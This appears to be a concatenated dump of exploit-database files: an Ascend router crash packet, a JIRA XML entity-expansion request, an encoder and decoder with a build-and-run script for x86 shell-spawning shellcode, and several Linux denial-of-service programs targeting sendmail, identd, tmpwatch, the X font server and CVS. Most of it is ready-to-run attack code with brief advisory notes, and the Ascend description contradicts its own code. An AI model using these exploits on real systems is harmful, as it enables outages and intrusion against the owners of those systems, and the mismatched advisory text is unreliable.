A vulnerability exists in the operating system of some Ascend routers. If an invalid TCP packet (of zero length) is sent to the administration port of Ascend Routers 4.5Ci12 or earlier, the result will be a crash and reboot of the attacked router, accomplishing a denial of service attack.
Note that 3Com is reportedly also vulnerable, but it is not verified which versions of IOS are exploitable.
/* Update, 3/20/98: Ascend has released 5.0Ap46 which corrects this bug.
* see ftp.ascend.com.
*/
/*
* Ascend Kill II - C version
*
* (C) 1998 Rootshell - http://www.rootshell.com/
*
* Released: 3/16/98
*
* Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues
* (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)
*
* Sends a specially constructed UDP packet on the discard port (9)
* which cause Ascend routers to reboot. (Warning! Ascend routers will
* process these if they are broadcast packets.)
*
* Compiled under RedHat 5.0 with glibc.
*
* NOTE: This program is NOT to be used for malicous purposes. This is
* intenteded for educational purposes only. By using this program
* you agree to use this for lawfull purposes ONLY.
*
* It is worth mentioning that Ascend has known about this bug for quite
* some time.
*
* Fix:
*
* Filter inbound UDP on port 9.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <linux/udp.h>
#include <netdb.h>
#define err(x) { fprintf(stderr, x); exit(1); }
#define errs(x, y) { fprintf(stderr, x, y); exit(1); }
/* This magic packet was taken from the Java Configurator */
char ascend_data[] =
{
0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
0x50, 0x41, 0x53, 0x53};
unsigned short
in_cksum (addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
int
sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport)
struct sockaddr_in *sin;
unsigned short int s, datalen, sport, dport;
unsigned long int saddr, daddr;
char *data;
{
struct iphdr ip;
struct udphdr udp;
static char packet[8192];
char crashme[500];
int i;
ip.ihl = 5;
ip.version = 4;
ip.tos = rand () % 100;;
ip.tot_len = htons (28 + datalen);
ip.id = htons (31337 + (rand () % 100));
ip.frag_off = 0;
ip.ttl = 255;
ip.protocol = IPPROTO_UDP;
ip.check = 0;
ip.saddr = saddr;
ip.daddr = daddr;
ip.check = in_cksum ((char *) &ip, sizeof (ip));
udp.source = htons (sport);
udp.dest = htons (dport);
udp.len = htons (8 + datalen);
udp.check = (short) 0;
memcpy (packet, (char *) &ip, sizeof (ip));
memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));
memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen);
/* Append random garbage to the packet, without this the router
will think this is a valid probe packet and reply. */
for (i = 0; i < 500; i++)
crashme[i] = rand () % 255;
memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500);
return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0,
(struct sockaddr *) sin, sizeof (struct sockaddr_in)));
}
unsigned int
lookup (host)
char *host;
{
unsigned int addr;
struct hostent *he;
addr = inet_addr (host);
if (addr == -1)
{
he = gethostbyname (host);
if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
return 0;
bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
}
return (addr);
}
void
main (argc, argv)
int argc;
char **argv;
{
unsigned int saddr, daddr;
struct sockaddr_in sin;
int s, i;
if (argc != 3)
errs ("Usage: %s <source_addr> <dest_addr>\n", argv[0]);
if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err ("Unable to open raw socket.\n");
if (!(saddr = lookup (argv[1])))
err ("Unable to lookup source address.\n");
if (!(daddr = lookup (argv[2])))
err ("Unable to lookup destination address.\n");
sin.sin_family = AF_INET;
sin.sin_port = 9;
sin.sin_addr.s_addr = daddr;
if ((sendpkt_udp (&sin, s, &ascend_data, sizeof (ascend_data), saddr, daddr, 9, 9)) == -1)
{
perror ("sendpkt_udp");
err ("Error sending the UDP packet.\n");
}
}

53
platforms/jsp/dos/37218.txt Executable file
View file

@ -0,0 +1,53 @@
source: http://www.securityfocus.com/bid/53595/info
JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data.
Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application.
The following versions are affected:
Versions prior to JIRA 5.0.1 are vulnerable.
Versions prior to Gliffy 3.7.1 are vulnerable.
Versions prior to Tempo versions 6.4.3.1, 6.5.1, and 7.0.3 are vulnerable.
POST somehost.com HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: somehost.com
Content-Length: 1577
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com">
<soapenv:Header/>
<soapenv:Body>
<urn:authenticateApplication>
<urn:in0>
<aut:credential>
<aut:credential>stuff1</aut:credential>
<aut:encryptedCredential>?&lol9;</aut:encryptedCredential>
</aut:credential>
<aut:name>stuff3</aut:name>
<aut:validationFactors>
<aut:ValidationFactor>
<aut:name>stuff4</aut:name>
<aut:value>stuff5</aut:value>
</aut:ValidationFactor>
</aut:validationFactors>
</urn:in0>
</urn:authenticateApplication>
</soapenv:Body>
</soapenv:Envelope>

146
platforms/lin_x86/shellcode/37762.py Executable file
View file

@ -0,0 +1,146 @@
Custom shellcode encoder/decoder that switches between byte ROR and byte ROL
1. Update eRORoROL-encoder.py with your shellcode
2. Run eRORoROL-encoder.py
3. Copy output from eRORoROL-encoder.py and update eRORoROL-decoder.nasm
4. Run eRORoROL_compile.sh
-----eRORoROL-encoder.py BEGIN CODE-----
#!/usr/bin/python
# Python Custom Encoding eRORoROL
# Author: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
# Description: If index number is Even do a ROR, else do a ROL
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
format_slash_x = ""
format_0x = ""
counter = 0
max_bits = 8
offset = 1
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
rol = lambda val, r_bits, max_bits: \
(val << r_bits%max_bits) & (2**max_bits-1) | \
((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
print "Shellcode encryption started ..."
for x in bytearray(shellcode):
#go through all hexadecimal values
counter += 1
print "[i] Counter: "+str(counter)
print "[i] Instruction in hex: "+ hex(x)
print "[i] Instruction in decimal: "+ str(x)
if counter%2==0: #check if index number is odd or even
print "[i] EVEN index, therefore do ROR"
rox_encoded_instruction = ror(x, offset, max_bits)
else:
print "[i] ODD index therefore do ROL"
rox_encoded_instruction = rol(x, offset, max_bits)
encoded_instruction_in_hex = '%02x' % rox_encoded_instruction
print "[i] Encoded instruction in hex: "+encoded_instruction_in_hex +"\n"
#Beautify with 0x and comma
format_0x += '0x'
format_0x += encoded_instruction_in_hex+","
print "\n[+] Shellcode custom encoding done"
print "\n[i] Initial shellcode length: %d" % len(bytearray(shellcode))
length_format_0x = format_0x.count(',')
print "[i] Encoded format 0x Length: %d" % length_format_0x
print "[i] Encoded format 0x:\t"+ format_0x
if "0x0," in format_0x: print "\n[!] :( WARNING: Output shellcode contains NULL byte(s), consider re-encoding with different offset."
else: print "\n[i] :) Good to go, no NULL bytes detected in output"
print "\n[i] Done!"
-----eRORoROL-encoder.py END CODE-----
-----eRORoROL-decoder.nasm BEGIN CODE-----
; Title: eRORoROL-decoder.nasm
; Author: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
; Description: If index number is Even do a ROR, else do a ROL
global _start
section .text
_start:
jmp short call_shellcode
decoder:
pop esi ;shellcode on ESI
xor ecx,ecx ;our loop counter
mov cl, shellcode_length ;mov cl, 25;shellcode_length 25 bytes
check_even_odd:
test si, 01h ;perform (si & 01h) discarding the result but set the eflags
;set ZF to 1 if (the least significant bit of SI is 0)
;EVEN: if_least_significant_bit_of_SI_is_0 AND 01h: result is 0 then ZF=0)
;ODD: if_least_significant_bit_of_SI_is_1 AND 01h: result is 1 then ZF=1)
je even_number ;if SI==0 then the number is even
;else execute the odd number section
odd_number:
rol byte [esi], 0x1 ;rol decode with 1 offset
jmp short inc_dec
even_number:
ror byte [esi], 0x1 ;ror decode with 1 offset
inc_dec:
inc esi ;next instruction in the encoded shellcode
loop check_even_odd ;loop uses ECX for counter
jmp short shellcode
call_shellcode:
call decoder
shellcode: db 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01
shellcode_length equ $-shellcode
-----eRORoROL-decoder.nasm END CODE-----
-----eRORoROL_compile.sh BEGIN CODE-----
#!/bin/bash
echo '[+] Assembling with Nasm ... '
nasm -f elf32 -o $1.o $1.nasm
echo '[+] Linking ...'
ld -melf_i386 -o $1 $1.o
echo '[+] Dumping shellcode ...'
echo '' > shellcode.nasm
for i in `objdump -d $1 | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" >> shellcode.nasm; done
echo '[+] Creating new shellcode.c ...'
cat > shellcode.c <<EOF
#include<stdio.h>
#include<string.h>
unsigned char code[] ="\\
EOF
echo -n "\\" >> shellcode.c
cat shellcode.nasm >> shellcode.c
cat >> shellcode.c <<EOF
";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
EOF
echo '[+] Compiling shellcode.c ...'
gcc -fno-stack-protector -z execstack -m32 -o shellcode shellcode.c
echo '[+] Done! Run ./shellcode to execute!'
-----eRORoROL_compile.sh END CODE-----

31
platforms/linux/dos/10022.c Executable file
View file

@ -0,0 +1,31 @@
int main(void)
{
int ret;
int csd;
int lsd;
struct sockaddr_un sun;
/* make an abstruct name address (*) */
memset(&sun, 0, sizeof(sun));
sun.sun_family = PF_UNIX;
sprintf(&sun.sun_path[1], "%d", getpid());
/* create the listening socket and shutdown */
lsd = socket(AF_UNIX, SOCK_STREAM, 0);
bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
listen(lsd, 1);
shutdown(lsd, SHUT_RDWR);
/* connect loop */
alarm(15); /* forcely exit the loop after 15 sec */
for (;;) {
csd = socket(AF_UNIX, SOCK_STREAM, 0);
ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
if (-1 == ret) {
perror("connect()");
break;
}
puts("Connection OK");
}
return 0;
}

55
platforms/linux/dos/19075.c Executable file
View file

@ -0,0 +1,55 @@
source: http://www.securityfocus.com/bid/83/info
APC PowerChute PLUS is a software package that will safely shutdown computer systems locally or accross a network when UPS power starts to fail. When operating PowerChute PLUS normally listens to TCP ports 6547 and 6548, as well as for broadcast requests in UDP port 6549.
A request packet can be craftted and sent to the UDP port such that the upsd server will crash. This is been tested in the Solaris i386 version of the product.
It has also been reported the software will crash in some instances when port scanned.
It seems you can also manage any APC UPS remotely without providing any credential if you have the APC client software.
Both the client and server software also create files insecurely in /tmp. The pager script (dialpager.sh) also contains unsafe users of temporary files. The mailer script (mailer.sh) passes the files provided in the command line to rm without checking them.
----- begin downupsd.c -----
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
int main(int argc, char **argv) {
int s;
long on=1;
size_t addrsize;
char buffer[256];
struct sockaddr_in toaddr, fromaddr;
struct hostent h_ent;
if(argc!=2) {
fprintf(stderr, "Usage:\n\t%s <hostname running upsd>\n", argv[0]);
exit(0);
}
s = socket(AF_INET,SOCK_DGRAM,0);
setsockopt(s, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on));
printf("Crashing upsd on host's subnet: %s\n", argv[1]);
toaddr.sin_family = AF_INET;
toaddr.sin_port = htons(0);
toaddr.sin_addr.s_addr = 0x00000000;
bind(s, (struct sockaddr *)&toaddr, sizeof(struct sockaddr_in));
toaddr.sin_port = htons(6549);
memcpy((char *)&h_ent, (char *)gethostbyname(argv[1]), sizeof(h_ent));
memcpy(&toaddr.sin_addr.s_addr, h_ent.h_addr, sizeof(struct in_addr));
toaddr.sin_addr.s_addr |= 0xff000000;
strcpy(buffer, "027|1|public|9|0|0|2010~|0\0");
sendto(s, buffer, 256, 0, (struct sockaddr *)&toaddr,
sizeof(struct sockaddr_in));
printf("Crashed...\n");
close(s);
}
------- end downupsd.c -----

341
platforms/linux/dos/19282.c Executable file
View file

@ -0,0 +1,341 @@
source: http://www.securityfocus.com/bid/363/info
The 2.0.x kernels have a quirk in the TCP implementation that have to do with the accept() call returning after only a syn has been recieved (as opposed to the three way handshake having been completed). Sendmail, which is compiled on many unices, makes the assumption that the three way handshake has been completed and a tcp connection has been fully established. This trust in a standard tcp implementation is seen in the following section of code <src/daemon.c>:
t = accept(DaemonSocket,
(struct sockaddr *)&RealHostAddr, &lotherend);
if (t >= 0 || errno != EINTR)
break;
}
savederrno = errno;
(void) blocksignal(SIGALRM);
if (t < 0)
{ errno = savederrno;
syserr("getrequests: accept");
/* arrange to re-open the socket next time around */
(void) close(DaemonSocket);
DaemonSocket = -1;
refusingconnections = TRUE;
sleep(5);
continue;
}
It's possible to cause a denial of service here if a RST is sent after the initial SYN to the sendmail smtpd on port 25. If that were to be done, the sendmail smtpd would be caught in a loop (above) accepting, testing the socket [yes, the one which accept returned on listening on port 25], sleeping, and closing the socket for as long as the syns and following rsts are sent. It is also completely possible to do this with spoofed packets.
/*
* smad.c - sendmail accept dos -
*
* Salvatore Sanfilippo [AntireZ]
* Intesis SECURITY LAB Phone: +39-2-671563.1
* Via Settembrini, 35 Fax: +39-2-66981953
* I-20124 Milano ITALY Email: antirez@seclab.com
* md5330@mclink.it
*
* compile it under Linux with gcc -Wall -o smad smad.c
*
* usage: smad fakeaddr victim [port]
*/
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#define SLEEP_UTIME 100000 /* modify it if necessary */
#define PACKETSIZE (sizeof(struct iphdr) + sizeof(struct tcphdr))
#define OFFSETTCP (sizeof(struct iphdr))
#define OFFSETIP (0)
u_short cksum(u_short *buf, int nwords)
{
unsigned long sum;
u_short *w = buf;
for (sum = 0; nwords > 0; nwords-=2)
sum += *w++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return ~sum;
}
void resolver (struct sockaddr * addr, char *hostname, u_short port)
{
struct sockaddr_in *address;
struct hostent *host;
address = (struct sockaddr_in *)addr;
(void) bzero((char *)address, sizeof(struct sockaddr_in));
address->sin_family = AF_INET;
address->sin_port = htons(port);
address->sin_addr.s_addr = inet_addr(hostname);
if ( (int)address->sin_addr.s_addr == -1) {
host = gethostbyname(hostname);
if (host) {
bcopy( host->h_addr,
(char *)&address->sin_addr,host->h_length);
} else {
perror("Could not resolve address");
exit(-1);
}
}
}
int main(int argc, char **argv)
{
char runchar[] = "|/-\\";
char packet[PACKETSIZE],
*fromhost,
*tohost;
u_short fromport = 3000,
toport = 25;
struct sockaddr_in local, remote;
struct iphdr *ip = (struct iphdr*) (packet + OFFSETIP);
struct tcphdr *tcp = (struct tcphdr*) (packet + OFFSETTCP);
struct tcp_pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short lenght;
struct tcphdr tcpheader;
}
pseudoheader;
int sock, result, runcharid = 0;
if (argc < 3)
{
printf("usage: %s fakeaddr victim [port]\n", argv[0]);
exit(0);
}
if (argc == 4)
toport = atoi(argv[3]);
bzero((void*)packet, PACKETSIZE);
fromhost = argv[1];
tohost = argv[2];
resolver((struct sockaddr*)&local, fromhost, fromport);
resolver((struct sockaddr*)&remote, tohost, toport);
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sock == -1) {
perror("can't get raw socket");
exit(1);
}
/* src addr */
bcopy((char*)&local.sin_addr, &ip->saddr,sizeof(ip->saddr));
/* dst addr */
bcopy((char*)&remote.sin_addr,&ip->daddr,sizeof(ip->daddr));
ip->version = 4;
ip->ihl = sizeof(struct iphdr)/4;
ip->tos = 0;
ip->tot_len = htons(PACKETSIZE);
ip->id = htons(getpid() & 255);
/* no flags */
ip->frag_off = 0;
ip->ttl = 64;
ip->protocol = 6;
ip->check = 0;
tcp->th_dport = htons(toport);
tcp->th_sport = htons(fromport);
tcp->th_seq = htonl(32089744);
tcp->th_ack = htonl(0);
tcp->th_off = sizeof(struct tcphdr)/4;
/* 6 bit reserved */
tcp->th_flags = TH_SYN;
tcp->th_win = htons(512);
/* start of pseudo header stuff */
bzero(&pseudoheader, 12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=local.sin_addr.s_addr;
pseudoheader.daddr.s_addr=remote.sin_addr.s_addr;
pseudoheader.protocol = 6;
pseudoheader.lenght = htons(sizeof(struct tcphdr));
bcopy((char*) tcp, (char*) &pseudoheader.tcpheader,
sizeof(struct tcphdr));
/* end */
tcp->th_sum = cksum((u_short *) &pseudoheader,
12+sizeof(struct tcphdr));
/* 16 bit urg */
while (0)
{
result = sendto(sock, packet, PACKETSIZE, 0,
(struct sockaddr *)&remote, sizeof(remote));
if (result != PACKETSIZE)
{
perror("sending packet");
exit(0);
} printf("\b");
printf("%c", runchar[runcharid]);
fflush(stdout);
runcharid++;
if (runcharid == 4)
runcharid = 0;
usleep(SLEEP_UTIME);
}
return 0;
}

109
platforms/linux/dos/19463.c Executable file
View file

@ -0,0 +1,109 @@
source: http://www.securityfocus.com/bid/587/info
In the inetd.conf under certain distributions of SuSE Linux the in.identd daemon is started with the -w -t120 option. This means that one identd process waits 120 seconds after answering the first request to answer the next request. If a malicious remote attacker starts a large number of ident requests in a short period of time it will force the target machine to start multiple daemons because the initial daemon is in a time wait state. This can eventually lead the machine to starve itself of memory resulting essentially in a machine halt.
/* susekill.c by friedolin
*
* used to kill lame SuSE Linux boxes with identd running
* identd must be started with -w -t120 to crash a machine
*
* have fun, friedolin <hendrik@scholz.net>
*
* based on gewse.c by napster
*/
/* Tested systems:
*
* vulnerable:
*
* SuSE-Linux 4.4 - 6.2
* Slackware 3.2 and 3.6
*
* not vulnerable:
*
* RedHat 5.0 - 6.0
* Debian 2.0 - 2.1
*
* not tested:
*
* pre 4.3 SuSE systems
* pre 5.0 RedHat
* pre 2.0 Debian
* other Slackware releases
* Caldera Open Linux, ...
*
* please send me your results and experiences !
*
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#define GETIDENT "1027, 6667 : USERID : UNIX : killsuse"
int sockdesc;
int portkill;
int numkill;
int x;
void usage(char *progname)
{
printf("susekill by friedolin (based on gewse.c)\n");
printf("usage: %s <host> <# of connections>\n",progname);
exit(69);
}
main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *he;
if (argc<3) usage(argv[0]);
sin.sin_port = htons(113);
sin.sin_family = AF_INET;
he = gethostbyname(argv[1]);
if (he) {
sin.sin_family = AF_INET;
sin.sin_port = htons(113);
memcpy((caddr_t)&sin.sin_addr.s_addr, he->h_addr, he->h_length);
} else {
perror("resolving");
}
numkill = atoi(argv[2]);
printf("Flooding %s [%s] identd %d times.\n", argv[1], inet_ntoa(sin.sin_addr.s_addr), numkill);
printf("Killing");
fflush(stdout);
for (x=1;x<=numkill;x++) {
sockdesc = socket(AF_INET, SOCK_STREAM, 0);
if (sockdesc < 0) {
perror("socket");
exit(69);
}
if (connect(sockdesc, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
perror("connect");
exit(69);
}
printf(" .");
fflush(stdout);
(void) write(sockdesc, GETIDENT, strlen(GETIDENT));
}
printf("\n");
}

24
platforms/linux/dos/19701.sh Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/904/info
There is a low-bandwidth dos vulnerability in Sendmail. When a client connects to the sendmail smtpd and sends an ETRN command to the server, the server fork()s and sleeps for 5 seconds. If many ETRN commands are sent to a server, it is possible to exhaust system resources and cause a denial of service or even a reboot of the server.
#!/bin/sh
TARGET=localhost
COUNT=150
SLEEP=1
echo "gurghfrbl.sh - (c) lcamtuf '99"
echo -n "Tickle"
while :; do
echo -n "."
(
NIC=0
while [ "$NIC" -lt "$COUNT" ]; do
echo "ETRN x"
done
) | telnet $TARGET 25 &>/dev/null &
sleep $SLEEP
killall -9 telnet &>/dev/null
done

27
platforms/linux/dos/19818.c Executable file
View file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/1072/info
A denial of service exists in Linux kernels, as related to Unix domain sockets ignoring limits as set in /proc/sys/net/core/wmem_max. By creating successive Unix domain sockets, it is possible to cause a denial of service in some versions of the Linux kernel. Versions 2.2.12, 2.2.14, and 2.3.99-pre2 have all been confirmed as being vulnerable. Previous kernel versions are most likely vulnerable.
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
char buf[128 * 1024];
int main ( int argc, char **argv )
{
struct sockaddr SyslogAddr;
int LogFile;
int bufsize = sizeof(buf)-5;
int i;
for ( i = 0; i < bufsize; i++ )
buf[i] = ' '+(i%95);
buf[i] = '\0';
SyslogAddr.sa_family = AF_UNIX;
strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) );
LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
return 0;
}

31
platforms/linux/dos/19850.c Executable file
View file

@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/1111/info
A denial of service exists in the X11 font server shipped with RedHat Linux 6.x. Due to improper input validation, it is possible for any user to crash the X fontserver. This will prevent the X server from functioning properly.
Additional, similar problems exist in the stock xfs. Users can crash the font server remotely, and potential exists for buffer overruns. The crux of the problem stems from the font server being lax about verifying network input. While no exploits exist, it is likely they are available in private circles, and can result in remote root compromise.
#include <sys/socket.h>
#include <sys/un.h>
#define CNT 50
#define FS "/tmp/.font-unix/fs-1"
int s,y;
struct sockaddr_un x;
char buf[CNT];
main() {
for (y;y<2;y++) {
s=socket(PF_UNIX,SOCK_STREAM,0);
x.sun_family=AF_UNIX;
strcpy(x.sun_path,FS);
if (connect(s,&x,sizeof(x))) { perror(FS); exit(1); }
if (!y) write(s,"lK",2);
memset(buf,'A',CNT);
write(s,buf,CNT);
shutdown(s,2);
close(s);
}
}

16
platforms/linux/dos/19870.pl Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/1136/info
CVS stands for Concurrent Versions Software and is an open-source package designed to allow multiple developers to work concurrently on a single source tree, recording changes and controlling versions. It is possible to cause a denial of service for users of CVS due to predictable temporary filenames. CVS uses locking directories in /tmp and combines the static string 'cvs-serv' with the process ID to use as filenames. This is trivial to guess for an attacker, and since /tmp is world writeable, directories can be created with predicted names. CVS drops root priviliges, so these directories cannot be overwritten and every session for which a locking directory has been already created (by the attacker) will be broken.
The following perl script will create many directories in /tmp with incrementing pids:
#!/usr/bin/perl
$min=400;
$max=4000;
for ($x=$min;$x<=$max;$x++) {
open CVSTMP, ">>/tmp/cvs-serv$x" or die "/tmp/cvs-serv$x: $!";
chmod 0600, "/tmp/cvs-serv$x";
close CVSTMP;
}

137
platforms/linux/dos/20217.c Executable file
View file

@ -0,0 +1,137 @@
source: http://www.securityfocus.com/bid/1664/info
Any user with write access to /tmp or /var/tmp, can induce tmpwatch to cause Red Hat (and others runnng tmpwatch from cron) to stop responding, and possibly require a hard reboot. This is accomplished by creating a directory tree many (ie. ~6000) nodes deep in /tmp. For each level of the directory in /tmp, tmpwatch will fork() a new copy of itself.
Red Hat affected versions:
Red Hat Linux 7.0 (tmpwatch v.2.5.1)
Red Hat Linux 6.2 (tmpwatch v.2.2)
Note:
(excerpted from Internet Security Systems Security Advisory)
"Source code comparison between the Red Hat Linux 6.2 and 7.0 tmpwatch packages
suggests this vulnerability was recognized and a fix was attempted. However,
the fix is incorrect, and the vulnerability is still exploitable.
Do not use the --fuser or -s options with tmpwatch."
---START---cut---:a.c (mode 644)
//
// make lots of directories.
// ./a <#of-dirs>
// ./a with no arguments to delete dirs.
main(int argc,char *argv[])
{
int c=0,d=0;
if (argc!=2)
{
while(!chdir("./A"))c++;
chdir("..");
printf("c=%d removing\n",c);
while(!rmdir("./A")) {chdir("..");c--;}
if(c)printf("erm. bad thing.\n");
}
else
{
c=atoi(argv[1]);
printf("c=%d making.\n",c);
while(c--)
{
mkdir("./A",0777);
chdir("./A");
}
}
}
--END---cut-----:a.c
# ./testscript
(code follows)
---START---cut---:testscript (mode 755)
#!/bin/sh
# clear the previous stuff.
./a
rm ./timer.results
touch timer.results
# create a 1 deep
./a 1 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 100 deep
./a 100 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 200 deep
./a 200 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 300 deep
./a 300 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 400 deep
./a 400 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 500 deep
./a 500 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 600 deep
./a 600 >>timer.results
time tmpwatch 240 . 2>>timer.results
#tidy up.
./a >>timer.results
--END---cut-----:testscript
If you don't want to test it manually, here you will find the results on
the tests on my machine. Who says u need an Athlon with cable or DSL. I
say "Well, it would be nice. Real nice." I also think this program would
probably die faster and more spectacularly on a fast machine with a huge
amount of memory and swap space. Oh yeah. Save anything important. And you
have to run it as root. (I think. Should probably thought of that. I'll
remember it for next time.) The crontab is an effective way of getting it
run as root. Which it wants to do anyway. At about 4am everyday.
--START---cut---:timer.results (mode 644)
c=1 making.
0.00user 0.01system 0:00.00elapsed 125%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (96major+58minor)pagefaults 0swaps
c=100 making.
0.01user 0.19system 0:00.19elapsed 100%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (96major+1797minor)pagefaults 0swaps
c=200 making.
0.07user 0.40system 0:00.49elapsed 94%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (96major+3554minor)pagefaults 0swaps
c=300 making.
0.10user 0.66system 0:00.76elapsed 99%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (96major+5308minor)pagefaults 0swaps
c=400 making.
0.13user 1.33system 0:11.80elapsed 12%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (11766major+9445minor)pagefaults 1263swaps
c=500 making.
0.15user 2.11system 0:22.38elapsed 10%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (14104major+13238minor)pagefaults 2699swaps
c=600 making.
0.21user 2.81system 0:32.61elapsed 9%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (26066major+17781minor)pagefaults 4109swaps
c=600 removing
c=600 making.
0.11user 2.88system 0:36.14elapsed 8%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (25741major+17567minor)pagefaults 4009swaps
c=700 making.
0.20user 4.24system 0:45.95elapsed 9%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (35562major+22180minor)pagefaults 5542swaps
c=800 making.
Command terminated by signal 2
